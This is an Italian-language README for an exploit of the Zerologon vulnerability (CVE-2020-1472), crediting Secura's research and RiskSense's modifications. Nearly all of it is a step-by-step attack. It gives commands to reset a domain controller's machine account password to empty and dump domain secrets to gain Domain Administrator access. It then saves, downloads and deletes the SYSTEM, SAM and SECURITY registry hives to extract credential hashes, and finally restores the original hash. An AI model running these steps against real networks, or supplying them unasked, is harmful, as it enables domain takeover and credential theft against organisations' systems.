
Exploit per zerologon cve-2020-1472
Codice exploit basato su https://www.secura.com/blog/zero-logon e https://github.com/SecuraBV/CVE-2020-1472. Ricerca originale e scanner di Secura, modifiche di RiskSense Inc.
Per sfruttarlo, elimina eventuali installazioni precedenti di Impacket che hai e installa Impacket da https://github.com/SecureAuthCorp/impacket/commit/b867b21 o più recente. Quindi, esegui:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Se ha successo, potrai quindi:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
che dovrebbe darti l'accesso come Amministratore di Dominio. Dopo averlo ottenuto, usa wmiexec.py sul DC di destinazione con una credenziale dal secretsdump ed esegui
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
Poi puoi
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
E questo dovrebbe mostrarti l'hash NT originale dell'account del computer. Puoi quindi reinstallare l'hash originale dell'account del computer nel dominio tramite
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Reinstallare l'hash originale è necessario affinché il DC continui a funzionare normalmente.